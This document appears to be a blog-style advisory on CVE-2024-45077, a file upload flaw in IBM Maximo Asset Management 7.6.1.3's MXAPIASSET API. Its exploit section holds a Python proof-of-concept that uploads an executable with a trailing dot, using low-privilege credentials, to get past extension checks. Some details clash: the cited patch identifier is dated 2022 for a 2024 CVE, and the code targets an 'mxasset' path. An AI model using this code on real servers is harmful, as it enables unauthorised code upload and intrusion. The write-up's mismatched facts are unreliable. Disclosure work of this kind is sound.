CVE-2024-45077: Unrestricted File Upload Vulnerability in IBM Maximo Asset Management 7.6.1.3 MXAPIASSET API

A recently discovered security vulnerability (CVE-2024-45077) in IBM Maximo Asset Management 7.6.1.3 MXAPIASSET API allows authenticated low privileged users to upload restricted file types by simply adding a dot to the end of the file name. This vulnerability can be exploited if Maximo is installed on a Windows operating system.

Background

IBM Maximo Asset Management is a comprehensive asset lifecycle and maintenance management solution that optimizes asset performance, extends asset life, and reduces operational downtime. The MXAPIASSET API provides a flexible and extensible interface for interacting with Maximo asset data.

Exploit Details

This vulnerability stems from insufficient input validation of file names in the MXAPIASSET API. An attacker with low privileged access to the Maximo Asset Management system can bypass file extension restrictions by appending a dot to the end of the file name. This allows the attacker to upload potentially dangerous files that can lead to remote code execution, data exfiltration, or other malicious actions.

Here's a code snippet demonstrating the exploitation of this vulnerability

import requests

maximo_url = 'https://example.com/maximo/oslc/os/mxasset';
auth = ('low_privilege_user', 'password')

# Prepare the file payload
file_data = open('malicious_payload.exe.', 'rb')
payload = {'data': ('malicious_payload.exe.', file_data)}

# Send the file upload request
response = requests.post(maximo_url, files=payload, auth=auth)
file_data.close()

if response.status_code == 200:
    print("File uploaded successfully")
else:
    print("Failed to upload file")

Mitigation

IBM has released a security patch (7.6.1.3-TIV-MAM_7613_IFIX.2022018) that addresses this vulnerability by validating file names more strictly and ensuring that file extension restrictions are enforced properly. It is highly recommended to upgrade to the latest version or apply the security patch as soon as possible.

References

1. IBM Maximo Asset Management 7.6.1.3 official website: (https://www.ibm.com/products/maximo-asset-management)
2. CVE-2024-45077 official advisory page: (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45077)
3. IBM Security Bulletin: (https://www.ibm.com/support/pages/node/6720496)
4. IBM Maximo Asset Management 7.6.1.3 documentation: (https://www.ibm.com/docs/en/maximo-asset-mgmt?topic=software-maximo-asset-management-7613)

Conclusion

The unrestricted file upload vulnerability in IBM Maximo Asset Management 7.6.1.3 MXAPIASSET API (CVE-2024-45077) poses a significant risk to organizations using this software on Windows operating systems. It's crucial to apply the security patch or upgrade to the latest version as soon as possible to mitigate the risk of potential exploitation.

Timeline

Published on: 01/24/2025 16:15:36 UTC